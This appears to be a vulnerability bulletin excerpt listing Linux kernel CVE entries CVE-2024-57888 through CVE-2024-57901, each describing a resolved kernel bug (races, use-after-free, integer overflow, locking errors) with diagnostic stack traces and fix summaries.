In the Linux kernel, the following vulnerability has been resolved: workqueue: Do not warn when cancelling WQ_MEM_RECLAIM work from !WQ_MEM_RECLAIM worker After commit 746ae46c1113 ("drm/sched: Mark scheduler work queues with WQ_MEM_RECLAIM") amdgpu started seeing the following warning: [ ] workqueue: WQ_MEM_RECLAIM sdma0:drm_sched_run_job_work [gpu_sched] is flushing !WQ_MEM_RECLAIM events:amdgpu_device_delay_enable_gfx_off [amdgpu] ... [ ] Workqueue: sdma0 drm_sched_run_job_work [gpu_sched] ... [ ] Call Trace: [ ] <TASK> ... [ ] ? check_flush_dependency+0xf5/0x110 ... [ ] cancel_delayed_work_sync+0x6e/0x80 [ ] amdgpu_gfx_off_ctrl+0xab/0x140 [amdgpu] [ ] amdgpu_ring_alloc+0x40/0x50 [amdgpu] [ ] amdgpu_ib_schedule+0xf4/0x810 [amdgpu] [ ] ? drm_sched_run_job_work+0x22c/0x430 [gpu_sched] [ ] amdgpu_job_run+0xaa/0x1f0 [amdgpu] [ ] drm_sched_run_job_work+0x257/0x430 [gpu_sched] [ ] process_one_work+0x217/0x720 ... [ ] </TASK> The intent of the verifcation done in check_flush_depedency is to ensure forward progress during memory reclaim, by flagging cases when either a memory reclaim process, or a memory reclaim work item is flushed from a context not marked as memory reclaim safe. This is correct when flushing, but when called from the cancel(_delayed)_work_sync() paths it is a false positive because work is either already running, or will not be running at all. Therefore cancelling it is safe and we can relax the warning criteria by letting the helper know of the calling context. References: 746ae46c1113 ("drm/sched: Mark scheduler work queues with WQ_MEM_RECLAIM") | 2025-01-15 | not yet calculated | CVE-2024-57888 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: pinctrl: mcp23s08: Fix sleeping in atomic context due to regmap locking If a device uses MCP23xxx IO expander to receive IRQs, the following bug can happen: BUG: sleeping function called from invalid context at kernel/locking/mutex.c:283 in_atomic(): 1, irqs_disabled(): 1, non_block: 0, ... preempt_count: 1, expected: 0 ... Call Trace: ... __might_resched+0x104/0x10e __might_sleep+0x3e/0x62 mutex_lock+0x20/0x4c regmap_lock_mutex+0x10/0x18 regmap_update_bits_base+0x2c/0x66 mcp23s08_irq_set_type+0x1ae/0x1d6 __irq_set_trigger+0x56/0x172 __setup_irq+0x1e6/0x646 request_threaded_irq+0xb6/0x160 ... We observed the problem while experimenting with a touchscreen driver which used MCP23017 IO expander (I2C). The regmap in the pinctrl-mcp23s08 driver uses a mutex for protection from concurrent accesses, which is the default for regmaps without .fast_io, .disable_locking, etc. mcp23s08_irq_set_type() calls regmap_update_bits_base(), and the latter locks the mutex. However, __setup_irq() locks desc->lock spinlock before calling these functions. As a result, the system tries to lock the mutex whole holding the spinlock. It seems, the internal regmap locks are not needed in this driver at all. mcp->lock seems to protect the regmap from concurrent accesses already, except, probably, in mcp_pinconf_get/set. mcp23s08_irq_set_type() and mcp23s08_irq_mask/unmask() are called under chip_bus_lock(), which calls mcp23s08_irq_bus_lock(). The latter takes mcp->lock and enables regmap caching, so that the potentially slow I2C accesses are deferred until chip_bus_unlock(). The accesses to the regmap from mcp23s08_probe_one() do not need additional locking. In all remaining places where the regmap is accessed, except mcp_pinconf_get/set(), the driver already takes mcp->lock. This patch adds locking in mcp_pinconf_get/set() and disables internal locking in the regmap config. Among other things, it fixes the sleeping in atomic context described above. | 2025-01-15 | not yet calculated | CVE-2024-57889 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: RDMA/uverbs: Prevent integer overflow issue In the expression "cmd.wqe_size * cmd.wr_count", both variables are u32 values that come from the user so the multiplication can lead to integer wrapping. Then we pass the result to uverbs_request_next_ptr() which also could potentially wrap. The "cmd.sge_count * sizeof(struct ib_uverbs_sge)" multiplication can also overflow on 32bit systems although it's fine on 64bit systems. This patch does two things. First, I've re-arranged the condition in uverbs_request_next_ptr() so that the use controlled variable "len" is on one side of the comparison by itself without any math. Then I've modified all the callers to use size_mul() for the multiplications. | 2025-01-15 | not yet calculated | CVE-2024-57890 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: sched_ext: Fix invalid irq restore in scx_ops_bypass() While adding outer irqsave/restore locking, 0e7ffff1b811 ("scx: Fix raciness in scx_ops_bypass()") forgot to convert an inner rq_unlock_irqrestore() to rq_unlock() which could re-enable IRQ prematurely leading to the following warning: raw_local_irq_restore() called with IRQs enabled WARNING: CPU: 1 PID: 96 at kernel/locking/irqflag-debug.c:10 warn_bogus_irq_restore+0x30/0x40 ... Sched_ext: create_dsq (enabling) pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : warn_bogus_irq_restore+0x30/0x40 lr : warn_bogus_irq_restore+0x30/0x40 ... Call trace: warn_bogus_irq_restore+0x30/0x40 (P) warn_bogus_irq_restore+0x30/0x40 (L) scx_ops_bypass+0x224/0x3b8 scx_ops_enable.isra.0+0x2c8/0xaa8 bpf_scx_reg+0x18/0x30 ... irq event stamp: 33739 hardirqs last enabled at (33739): [<ffff8000800b699c>] scx_ops_bypass+0x174/0x3b8 hardirqs last disabled at (33738): [<ffff800080d48ad4>] _raw_spin_lock_irqsave+0xb4/0xd8 Drop the stray _irqrestore(). | 2025-01-15 | not yet calculated | CVE-2024-57891 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: ocfs2: fix slab-use-after-free due to dangling pointer dqi_priv When mounting ocfs2 and then remounting it as read-only, a slab-use-after-free occurs after the user uses a syscall to quota_getnextquota. Specifically, sb_dqinfo(sb, type)->dqi_priv is the dangling pointer. During the remounting process, the pointer dqi_priv is freed but is never set as null leaving it to be accessed. Additionally, the read-only option for remounting sets the DQUOT_SUSPENDED flag instead of setting the DQUOT_USAGE_ENABLED flags. Moreover, later in the process of getting the next quota, the function ocfs2_get_next_id is called and only checks the quota usage flags and not the quota suspended flags. To fix this, I set dqi_priv to null when it is freed after remounting with read-only and put a check for DQUOT_SUSPENDED in ocfs2_get_next_id. [akpm@linux-foundation.org: coding-style cleanups] | 2025-01-15 | not yet calculated | CVE-2024-57892 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: ALSA: seq: oss: Fix races at processing SysEx messages OSS sequencer handles the SysEx messages split in 6 bytes packets, and ALSA sequencer OSS layer tries to combine those. It stores the data in the internal buffer and this access is racy as of now, which may lead to the out-of-bounds access. As a temporary band-aid fix, introduce a mutex for serializing the process of the SysEx message packets. | 2025-01-15 | not yet calculated | CVE-2024-57893 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_core: Fix sleeping function called from invalid context This reworks hci_cb_list to not use mutex hci_cb_list_lock to avoid bugs like the bellow: BUG: sleeping function called from invalid context at kernel/locking/mutex.c:585 in_atomic(): 0, irqs_disabled(): 0, non_block: 0, pid: 5070, name: kworker/u9:2 preempt_count: 0, expected: 0 RCU nest depth: 1, expected: 0 4 locks held by kworker/u9:2/5070: #0: ffff888015be3948 ((wq_completion)hci0#2){+.+.}-{0:0}, at: process_one_work kernel/workqueue.c:3229 [inline] #0: ffff888015be3948 ((wq_completion)hci0#2){+.+.}-{0:0}, at: process_scheduled_works+0x8e0/0x1770 kernel/workqueue.c:3335 #1: ffffc90003b6fd00 ((work_completion)(&hdev->rx_work)){+.+.}-{0:0}, at: process_one_work kernel/workqueue.c:3230 [inline] #1: ffffc90003b6fd00 ((work_completion)(&hdev->rx_work)){+.+.}-{0:0}, at: process_scheduled_works+0x91b/0x1770 kernel/workqueue.c:3335 #2: ffff8880665d0078 (&hdev->lock){+.+.}-{3:3}, at: hci_le_create_big_complete_evt+0xcf/0xae0 net/bluetooth/hci_event.c:6914 #3: ffffffff8e132020 (rcu_read_lock){....}-{1:2}, at: rcu_lock_acquire include/linux/rcupdate.h:298 [inline] #3: ffffffff8e132020 (rcu_read_lock){....}-{1:2}, at: rcu_read_lock include/linux/rcupdate.h:750 [inline] #3: ffffffff8e132020 (rcu_read_lock){....}-{1:2}, at: hci_le_create_big_complete_evt+0xdb/0xae0 net/bluetooth/hci_event.c:6915 CPU: 0 PID: 5070 Comm: kworker/u9:2 Not tainted 6.8.0-syzkaller-08073-g480e035fc4c7 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024 Workqueue: hci0 hci_rx_work Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x241/0x360 lib/dump_stack.c:114 __might_resched+0x5d4/0x780 kernel/sched/core.c:10187 __mutex_lock_common kernel/locking/mutex.c:585 [inline] __mutex_lock+0xc1/0xd70 kernel/locking/mutex.c:752 hci_connect_cfm include/net/bluetooth/hci_core.h:2004 [inline] hci_le_create_big_complete_evt+0x3d9/0xae0 net/bluetooth/hci_event.c:6939 hci_event_func net/bluetooth/hci_event.c:7514 [inline] hci_event_packet+0xa53/0x1540 net/bluetooth/hci_event.c:7569 hci_rx_work+0x3e8/0xca0 net/bluetooth/hci_core.c:4171 process_one_work kernel/workqueue.c:3254 [inline] process_scheduled_works+0xa00/0x1770 kernel/workqueue.c:3335 worker_thread+0x86d/0xd70 kernel/workqueue.c:3416 kthread+0x2f0/0x390 kernel/kthread.c:388 ret_from_fork+0x4b/0x80 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:243 </TASK> | 2025-01-15 | not yet calculated | CVE-2024-57894 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: ksmbd: set ATTR_CTIME flags when setting mtime David reported that the new warning from setattr_copy_mgtime is coming like the following. [ 113.215316] ------------[ cut here ]------------ [ 113.215974] WARNING: CPU: 1 PID: 31 at fs/attr.c:300 setattr_copy+0x1ee/0x200 [ 113.219192] CPU: 1 UID: 0 PID: 31 Comm: kworker/1:1 Not tainted 6.13.0-rc1+ #234 [ 113.220127] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-3-gd478f380-rebuilt.opensuse.org 04/01/2014 [ 113.221530] Workqueue: ksmbd-io handle_ksmbd_work [ksmbd] [ 113.222220] RIP: 0010:setattr_copy+0x1ee/0x200 [ 113.222833] Code: 24 28 49 8b 44 24 30 48 89 53 58 89 43 6c 5b 41 5c 41 5d 41 5e 41 5f 5d c3 cc cc cc cc 48 89 df e8 77 d6 ff ff e9 cd fe ff ff <0f> 0b e9 be fe ff ff 66 0 [ 113.225110] RSP: 0018:ffffaf218010fb68 EFLAGS: 00010202 [ 113.225765] RAX: 0000000000000120 RBX: ffffa446815f8568 RCX: 0000000000000003 [ 113.226667] RDX: ffffaf218010fd38 RSI: ffffa446815f8568 RDI: ffffffff94eb03a0 [ 113.227531] RBP: ffffaf218010fb90 R08: 0000001a251e217d R09: 00000000675259fa [ 113.228426] R10: 0000000002ba8a6d R11: ffffa4468196c7a8 R12: ffffaf218010fd38 [ 113.229304] R13: 0000000000000120 R14: ffffffff94eb03a0 R15: 0000000000000000 [ 113.230210] FS: 0000000000000000(0000) GS:ffffa44739d00000(0000) knlGS:0000000000000000 [ 113.231215] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 113.232055] CR2: 00007efe0053d27e CR3: 000000000331a000 CR4: 00000000000006b0 [ 113.232926] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 113.233812] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 113.234797] Call Trace: [ 113.235116] <TASK> [ 113.235393] ? __warn+0x73/0xd0 [ 113.235802] ? setattr_copy+0x1ee/0x200 [ 113.236299] ? report_bug+0xf3/0x1e0 [ 113.236757] ? handle_bug+0x4d/0x90 [ 113.237202] ? exc_invalid_op+0x13/0x60 [ 113.237689] ? asm_exc_invalid_op+0x16/0x20 [ 113.238185] ? setattr_copy+0x1ee/0x200 [ 113.238692] btrfs_setattr+0x80/0x820 [btrfs] [ 113.239285] ? get_stack_info_noinstr+0x12/0xf0 [ 113.239857] ? __module_address+0x22/0xa0 [ 113.240368] ? handle_ksmbd_work+0x6e/0x460 [ksmbd] [ 113.240993] ? __module_text_address+0x9/0x50 [ 113.241545] ? __module_address+0x22/0xa0 [ 113.242033] ? unwind_next_frame+0x10e/0x920 [ 113.242600] ? __pfx_stack_trace_consume_entry+0x10/0x10 [ 113.243268] notify_change+0x2c2/0x4e0 [ 113.243746] ? stack_depot_save_flags+0x27/0x730 [ 113.244339] ? set_file_basic_info+0x130/0x2b0 [ksmbd] [ 113.244993] set_file_basic_info+0x130/0x2b0 [ksmbd] [ 113.245613] ? process_scheduled_works+0xbe/0x310 [ 113.246181] ? worker_thread+0x100/0x240 [ 113.246696] ? kthread+0xc8/0x100 [ 113.247126] ? ret_from_fork+0x2b/0x40 [ 113.247606] ? ret_from_fork_asm+0x1a/0x30 [ 113.248132] smb2_set_info+0x63f/0xa70 [ksmbd] ksmbd is trying to set the atime and mtime via notify_change without also setting the ctime. so This patch add ATTR_CTIME flags when setting mtime to avoid a warning. | 2025-01-15 | not yet calculated | CVE-2024-57895 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: btrfs: flush delalloc workers queue before stopping cleaner kthread during unmount During the unmount path, at close_ctree(), we first stop the cleaner kthread, using kthread_stop() which frees the associated task_struct, and then stop and destroy all the work queues. However after we stopped the cleaner we may still have a worker from the delalloc_workers queue running inode.c:submit_compressed_extents(), which calls btrfs_add_delayed_iput(), which in turn tries to wake up the cleaner kthread - which was already destroyed before, resulting in a use-after-free on the task_struct. Syzbot reported this with the following stack traces: BUG: KASAN: slab-use-after-free in __lock_acquire+0x78/0x2100 kernel/locking/lockdep.c:5089 Read of size 8 at addr ffff8880259d2818 by task kworker/u8:3/52 CPU: 1 UID: 0 PID: 52 Comm: kworker/u8:3 Not tainted 6.13.0-rc1-syzkaller-00002-gcdd30ebb1b9f #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024 Workqueue: btrfs-delalloc btrfs_work_helper Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x241/0x360 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0x169/0x550 mm/kasan/report.c:489 kasan_report+0x143/0x180 mm/kasan/report.c:602 __lock_acquire+0x78/0x2100 kernel/locking/lockdep.c:5089 lock_acquire+0x1ed/0x550 kernel/locking/lockdep.c:5849 __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline] _raw_spin_lock_irqsave+0xd5/0x120 kernel/locking/spinlock.c:162 class_raw_spinlock_irqsave_constructor include/linux/spinlock.h:551 [inline] try_to_wake_up+0xc2/0x1470 kernel/sched/core.c:4205 submit_compressed_extents+0xdf/0x16e0 fs/btrfs/inode.c:1615 run_ordered_work fs/btrfs/async-thread.c:288 [inline] btrfs_work_helper+0x96f/0xc40 fs/btrfs/async-thread.c:324 process_one_work kernel/workqueue.c:3229 [inline] process_scheduled_works+0xa66/0x1840 kernel/workqueue.c:3310 worker_thread+0x870/0xd30 kernel/workqueue.c:3391 kthread+0x2f0/0x390 kernel/kthread.c:389 ret_from_fork+0x4b/0x80 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244 </TASK> Allocated by task 2: kasan_save_stack mm/kasan/common.c:47 [inline] kasan_save_track+0x3f/0x80 mm/kasan/common.c:68 unpoison_slab_object mm/kasan/common.c:319 [inline] __kasan_slab_alloc+0x66/0x80 mm/kasan/common.c:345 kasan_slab_alloc include/linux/kasan.h:250 [inline] slab_post_alloc_hook mm/slub.c:4104 [inline] slab_alloc_node mm/slub.c:4153 [inline] kmem_cache_alloc_node_noprof+0x1d9/0x380 mm/slub.c:4205 alloc_task_struct_node kernel/fork.c:180 [inline] dup_task_struct+0x57/0x8c0 kernel/fork.c:1113 copy_process+0x5d1/0x3d50 kernel/fork.c:2225 kernel_clone+0x223/0x870 kernel/fork.c:2807 kernel_thread+0x1bc/0x240 kernel/fork.c:2869 create_kthread kernel/kthread.c:412 [inline] kthreadd+0x60d/0x810 kernel/kthread.c:767 ret_from_fork+0x4b/0x80 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244 Freed by task 24: kasan_save_stack mm/kasan/common.c:47 [inline] kasan_save_track+0x3f/0x80 mm/kasan/common.c:68 kasan_save_free_info+0x40/0x50 mm/kasan/generic.c:582 poison_slab_object mm/kasan/common.c:247 [inline] __kasan_slab_free+0x59/0x70 mm/kasan/common.c:264 kasan_slab_free include/linux/kasan.h:233 [inline] slab_free_hook mm/slub.c:2338 [inline] slab_free mm/slub.c:4598 [inline] kmem_cache_free+0x195/0x410 mm/slub.c:4700 put_task_struct include/linux/sched/task.h:144 [inline] delayed_put_task_struct+0x125/0x300 kernel/exit.c:227 rcu_do_batch kernel/rcu/tree.c:2567 [inline] rcu_core+0xaaa/0x17a0 kernel/rcu/tree.c:2823 handle_softirqs+0x2d4/0x9b0 kernel/softirq.c:554 run_ksoftirqd+0xca/0x130 kernel/softirq.c:943 ---truncated--- | 2025-01-15 | not yet calculated | CVE-2024-57896 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Correct the migration DMA map direction The SVM DMA device map direction should be set the same as the DMA unmap setting, otherwise the DMA core will report the following warning. Before finialize this solution, there're some discussion on the DMA mapping type(stream-based or coherent) in this KFD migration case, followed by https://lore.kernel.org/all/04d4ab32 -45a1-4b88-86ee-fb0f35a0ca40@amd.com/T/. As there's no dma_sync_single_for_*() in the DMA buffer accessed that because this migration operation should be sync properly and automatically. Give that there's might not be a performance problem in various cache sync policy of DMA sync. Therefore, in order to simplify the DMA direction setting alignment, let's set the DMA map direction as BIDIRECTIONAL. [ 150.834218] WARNING: CPU: 8 PID: 1812 at kernel/dma/debug.c:1028 check_unmap+0x1cc/0x930 [ 150.834225] Modules linked in: amdgpu(OE) amdxcp drm_exec(OE) gpu_sched drm_buddy(OE) drm_ttm_helper(OE) ttm(OE) drm_suballoc_helper(OE) drm_display_helper(OE) drm_kms_helper(OE) i2c_algo_bit rpcsec_gss_krb5 auth_rpcgss nfsv4 nfs lockd grace netfs xt_conntrack xt_MASQUERADE nf_conntrack_netlink xfrm_user xfrm_algo iptable_nat xt_addrtype iptable_filter br_netfilter nvme_fabrics overlay nfnetlink_cttimeout nfnetlink openvswitch nsh nf_conncount nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c bridge stp llc sch_fq_codel intel_rapl_msr amd_atl intel_rapl_common snd_hda_codec_realtek snd_hda_codec_generic snd_hda_scodec_component snd_hda_codec_hdmi snd_hda_intel snd_intel_dspcfg edac_mce_amd snd_pci_acp6x snd_hda_codec snd_acp_config snd_hda_core snd_hwdep snd_soc_acpi kvm_amd sunrpc snd_pcm kvm binfmt_misc snd_seq_midi crct10dif_pclmul snd_seq_midi_event ghash_clmulni_intel sha512_ssse3 snd_rawmidi nls_iso8859_1 sha256_ssse3 sha1_ssse3 snd_seq aesni_intel snd_seq_device crypto_simd snd_timer cryptd input_leds [ 150.834310] wmi_bmof serio_raw k10temp rapl snd sp5100_tco ipmi_devintf soundcore ccp ipmi_msghandler cm32181 industrialio mac_hid msr parport_pc ppdev lp parport efi_pstore drm(OE) ip_tables x_tables pci_stub crc32_pclmul nvme ahci libahci i2c_piix4 r8169 nvme_core i2c_designware_pci realtek i2c_ccgx_ucsi video wmi hid_generic cdc_ether usbnet usbhid hid r8152 mii [ 150.834354] CPU: 8 PID: 1812 Comm: rocrtst64 Tainted: G OE 6.10.0-custom #492 [ 150.834358] Hardware name: AMD Majolica-RN/Majolica-RN, BIOS RMJ1009A 06/13/2021 [ 150.834360] RIP: 0010:check_unmap+0x1cc/0x930 [ 150.834363] Code: c0 4c 89 4d c8 e8 34 bf 86 00 4c 8b 4d c8 4c 8b 45 c0 48 8b 4d b8 48 89 c6 41 57 4c 89 ea 48 c7 c7 80 49 b4 84 e8 b4 81 f3 ff <0f> 0b 48 c7 c7 04 83 ac 84 e8 76 ba fc ff 41 8b 76 4c 49 8d 7e 50 [ 150.834365] RSP: 0018:ffffaac5023739e0 EFLAGS: 00010086 [ 150.834368] RAX: 0000000000000000 RBX: ffffffff8566a2e0 RCX: 0000000000000027 [ 150.834370] RDX: ffff8f6a8f621688 RSI: 0000000000000001 RDI: ffff8f6a8f621680 [ 150.834372] RBP: ffffaac502373a30 R08: 00000000000000c9 R09: ffffaac502373850 [ 150.834373] R10: ffffaac502373848 R11: ffffffff84f46328 R12: ffffaac502373a40 [ 150.834375] R13: ffff8f6741045330 R14: ffff8f6741a77700 R15: ffffffff84ac831b [ 150.834377] FS: 00007faf0fc94c00(0000) GS:ffff8f6a8f600000(0000) knlGS:0000000000000000 [ 150.834379] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 150.834381] CR2: 00007faf0b600020 CR3: 000000010a52e000 CR4: 0000000000350ef0 [ 150.834383] Call Trace: [ 150.834385] <TASK> [ 150.834387] ? show_regs+0x6d/0x80 [ 150.834393] ? __warn+0x8c/0x140 [ 150.834397] ? check_unmap+0x1cc/0x930 [ 150.834400] ? report_bug+0x193/0x1a0 [ 150.834406] ? handle_bug+0x46/0x80 [ 150.834410] ? exc_invalid_op+0x1d/0x80 [ 150.834413] ? asm_exc_invalid_op+0x1f/0x30 [ 150.834420] ? check_unmap+0x1cc/0x930 [ 150.834425] debug_dma_unmap_page+0x86/0x90 [ 150.834431] ? srso_return_thunk+0x5/0x5f [ 150.834435] ---truncated--- | 2025-01-15 | not yet calculated | CVE-2024-57897 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: wifi: cfg80211: clear link ID from bitmap during link delete after clean up Currently, during link deletion, the link ID is first removed from the valid_links bitmap before performing any clean-up operations. However, some functions require the link ID to remain in the valid_links bitmap. One such example is cfg80211_cac_event(). The flow is - nl80211_remove_link() cfg80211_remove_link() ieee80211_del_intf_link() ieee80211_vif_set_links() ieee80211_vif_update_links() ieee80211_link_stop() cfg80211_cac_event() cfg80211_cac_event() requires link ID to be present but it is cleared already in cfg80211_remove_link(). Ultimately, WARN_ON() is hit. Therefore, clear the link ID from the bitmap only after completing the link clean-up. | 2025-01-15 | not yet calculated | CVE-2024-57898 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: wifi: mac80211: fix mbss changed flags corruption on 32 bit systems On 32-bit systems, the size of an unsigned long is 4 bytes, while a u64 is 8 bytes. Therefore, when using or_each_set_bit(bit, &bits, sizeof(changed) * BITS_PER_BYTE), the code is incorrectly searching for a bit in a 32-bit variable that is expected to be 64 bits in size, leading to incorrect bit finding. Solution: Ensure that the size of the bits variable is correctly adjusted for each architecture. Call Trace: ? show_regs+0x54/0x58 ? __warn+0x6b/0xd4 ? ieee80211_link_info_change_notify+0xcc/0xd4 [mac80211] ? report_bug+0x113/0x150 ? exc_overflow+0x30/0x30 ? handle_bug+0x27/0x44 ? exc_invalid_op+0x18/0x50 ? handle_exception+0xf6/0xf6 ? exc_overflow+0x30/0x30 ? ieee80211_link_info_change_notify+0xcc/0xd4 [mac80211] ? exc_overflow+0x30/0x30 ? ieee80211_link_info_change_notify+0xcc/0xd4 [mac80211] ? ieee80211_mesh_work+0xff/0x260 [mac80211] ? cfg80211_wiphy_work+0x72/0x98 [cfg80211] ? process_one_work+0xf1/0x1fc ? worker_thread+0x2c0/0x3b4 ? kthread+0xc7/0xf0 ? mod_delayed_work_on+0x4c/0x4c ? kthread_complete_and_exit+0x14/0x14 ? ret_from_fork+0x24/0x38 ? kthread_complete_and_exit+0x14/0x14 ? ret_from_fork_asm+0xf/0x14 ? entry_INT80_32+0xf0/0xf0 [restore no-op path for no changes] | 2025-01-15 | not yet calculated | CVE-2024-57899 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: ila: serialize calls to nf_register_net_hooks() syzbot found a race in ila_add_mapping() [1] commit 031ae72825ce ("ila: call nf_unregister_net_hooks() sooner") attempted to fix a similar issue. Looking at the syzbot repro, we have concurrent ILA_CMD_ADD commands. Add a mutex to make sure at most one thread is calling nf_register_net_hooks(). [1] BUG: KASAN: slab-use-after-free in rht_key_hashfn include/linux/rhashtable.h:159 [inline] BUG: KASAN: slab-use-after-free in __rhashtable_lookup.constprop.0+0x426/0x550 include/linux/rhashtable.h:604 Read of size 4 at addr ffff888028f40008 by task dhcpcd/5501 CPU: 1 UID: 0 PID: 5501 Comm: dhcpcd Not tainted 6.13.0-rc4-syzkaller-00054-gd6ef8b40d075 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024 Call Trace: <IRQ> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x116/0x1f0 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xc3/0x620 mm/kasan/report.c:489 kasan_report+0xd9/0x110 mm/kasan/report.c:602 rht_key_hashfn include/linux/rhashtable.h:159 [inline] __rhashtable_lookup.constprop.0+0x426/0x550 include/linux/rhashtable.h:604 rhashtable_lookup include/linux/rhashtable.h:646 [inline] rhashtable_lookup_fast include/linux/rhashtable.h:672 [inline] ila_lookup_wildcards net/ipv6/ila/ila_xlat.c:127 [inline] ila_xlat_addr net/ipv6/ila/ila_xlat.c:652 [inline] ila_nf_input+0x1ee/0x620 net/ipv6/ila/ila_xlat.c:185 nf_hook_entry_hookfn include/linux/netfilter.h:154 [inline] nf_hook_slow+0xbb/0x200 net/netfilter/core.c:626 nf_hook.constprop.0+0x42e/0x750 include/linux/netfilter.h:269 NF_HOOK include/linux/netfilter.h:312 [inline] ipv6_rcv+0xa4/0x680 net/ipv6/ip6_input.c:309 __netif_receive_skb_one_core+0x12e/0x1e0 net/core/dev.c:5672 __netif_receive_skb+0x1d/0x160 net/core/dev.c:5785 process_backlog+0x443/0x15f0 net/core/dev.c:6117 __napi_poll.constprop.0+0xb7/0x550 net/core/dev.c:6883 napi_poll net/core/dev.c:6952 [inline] net_rx_action+0xa94/0x1010 net/core/dev.c:7074 handle_softirqs+0x213/0x8f0 kernel/softirq.c:561 __do_softirq kernel/softirq.c:595 [inline] invoke_softirq kernel/softirq.c:435 [inline] __irq_exit_rcu+0x109/0x170 kernel/softirq.c:662 irq_exit_rcu+0x9/0x30 kernel/softirq.c:678 instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1049 [inline] sysvec_apic_timer_interrupt+0xa4/0xc0 arch/x86/kernel/apic/apic.c:1049 | 2025-01-15 | not yet calculated | CVE-2024-57900 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: af_packet: fix vlan_get_protocol_dgram() vs MSG_PEEK Blamed commit forgot MSG_PEEK case, allowing a crash [1] as found by syzbot. Rework vlan_get_protocol_dgram() to not touch skb at all, so that it can be used from many cpus on the same skb. Add a const qualifier to skb argument. [1] skbuff: skb_under_panic: text:ffffffff8a8ccd05 len:29 put:14 head:ffff88807fc8e400 data:ffff88807fc8e3f4 tail:0x11 end:0x140 dev:<NULL> ------------[ cut here ]------------ kernel BUG at net/core/skbuff.c:206 ! Oops: invalid opcode: 0000 [#1] PREEMPT SMP KASAN PTI CPU: 1 UID: 0 PID: 5892 Comm: syz-executor883 Not tainted 6.13.0-rc4-syzkaller-00054-gd6ef8b40d075 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024 RIP: 0010:skb_panic net/core/skbuff.c:206 [inline] RIP: 0010:skb_under_panic+0x14b/0x150 net/core/skbuff.c:216 Code: 0b 8d 48 c7 c6 86 d5 25 8e 48 8b 54 24 08 8b 0c 24 44 8b 44 24 04 4d 89 e9 50 41 54 41 57 41 56 e8 5a 69 79 f7 48 83 c4 20 90 <0f> 0b 0f 1f 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 RSP: 0018:ffffc900038d7638 EFLAGS: 00010282 RAX: 0000000000000087 RBX: dffffc0000000000 RCX: 609ffd18ea660600 RDX: 0000000000000000 RSI: 0000000080000000 RDI: 0000000000000000 RBP: ffff88802483c8d0 R08: ffffffff817f0a8c R09: 1ffff9200071ae60 R10: dffffc0000000000 R11: fffff5200071ae61 R12: 0000000000000140 R13: ffff88807fc8e400 R14: ffff88807fc8e3f4 R15: 0000000000000011 FS: 00007fbac5e006c0(0000) GS:ffff8880b8700000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fbac5e00d58 CR3: 000000001238e000 CR4: 00000000003526f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> skb_push+0xe5/0x100 net/core/skbuff.c:2636 vlan_get_protocol_dgram+0x165/0x290 net/packet/af_packet.c:585 packet_recvmsg+0x948/0x1ef0 net/packet/af_packet.c:3552 sock_recvmsg_nosec net/socket.c:1033 [inline] sock_recvmsg+0x22f/0x280 net/socket.c:1055 ____sys_recvmsg+0x1c6/0x480 net/socket.c:2803 ___sys_recvmsg net/socket.c:2845 [inline] do_recvmmsg+0x426/0xab0 net/socket.c:2940 __sys_recvmmsg net/socket.c:3014 [inline] __do_sys_recvmmsg net/socket.c:3037 [inline] __se_sys_recvmmsg net/socket.c:3030 [inline] __x64_sys_recvmmsg+0x199/0x250 net/socket.c:3030 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f | 2025-01-15 | not yet calculated | CVE-2024-57901 |
| Linux--Linux |
